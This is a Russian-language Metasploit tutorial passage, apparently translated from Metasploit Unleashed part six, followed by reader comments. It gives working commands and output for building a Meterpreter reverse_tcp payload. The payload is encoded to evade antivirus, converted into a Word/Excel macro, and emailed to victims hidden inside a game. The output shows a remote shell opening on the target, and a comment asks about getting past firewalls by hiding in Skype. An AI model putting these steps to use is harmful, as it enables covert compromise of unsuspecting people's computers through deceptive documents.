root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs [*] Converted 14510 bytes of EXE into a VBA script root@bt4:/pentest/exploits/framework3/tools# cd.. root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler [*] Please wait while we load the module tree... exploit/multi/handler Generic Payload Handler root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...
Следует пояснить, что мы сделали выше, мы создали полезную нагрузку, воспользовавшись кодировщиком shikata_ga_nai polymorphic, преобразовали ее в исполняемый файл, создав бэкконект к нашему хосту10.211.55.162 на порт 8080. Затем в разделе tools мы переконвертировали наш исполняемый файл в VBScript, используя скрипт "exe2vba.rb".
После завершения всех действий, перейдите к Windows машине c установленным пакетом Word и выполните следующие действия:
В Word или Excel 2003, перейдите в меню Tools, Macros, Visual Basic Editor, если вы используете Word / Excel 2007, выберите View Macros, выберете имя "moo" далее "create".
Эти действия откроют редактор visual basic. Вставьте в редактор вывод payload.vbs, сохраните, вставьте в документ. Этот документ можно использовать для атаки на стороне клиента, послав его по e-mail.
Для отвлечения подозрения попробуйте вложить документ в одну из многочисленных Word/Excel игр доступных в интернете. Таким образом, пока счастливый пользователь будет наслаждаться игрой, вы будете наслаждаться его системой в фоновом режиме.
Это дает вам некоторое дополнительное время для перехода на другой процесс, если вы используете Meterpreter в качестве полезной нагрузки.
Здесь мы даем общее название данного макроса.
Во-первых, нужно открыть созданный документ на Windows хосте, во-вторых перейти к Metasploit exploit/multi/handler прослушивающему порт.
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696) meterpreter > execute -f cmd.exe -i Process 2152 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\rel1k>
Успех! Мы заимели Meterpreter shell на системе, где был открыт документ, а антивирус на хосте остался не у дел.
Замечание Существует несколько методов, чтобы получить тот же результат, Вы также можете использовать:
root@bt4:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe
Эти действия произведут вывод полезной нагрузки в vbs скрипт, далее все те же шаги, что выше. Если макросы отключены в офисном приложении, нужно подтолкнуть жертву к включению, с помощью flash игры в документе это будет проще.
На этом шестую часть курса можно считать завершенной, до встречи в следующих частях.
Источник:
Перевод: Э_L_A_Y
подскажите, почему может выскакивать такое сообщение:
meterpreter > execute[-] Unknown command: execute.
Ну судя по всему — «неизвестная команда»
Когда запускаем екзешние, откриваеться соединение, которое режеться любим фаерволом.
Может есть какойто реверс тсп которий вклиниваеться в процес скайпа например?
ой, нетуда написал (: ето относиться к етой статье http://bruteforcer.ru/index.php/2009/11/15/metasploit-unleashed-mastering-the-framework-part-6/3/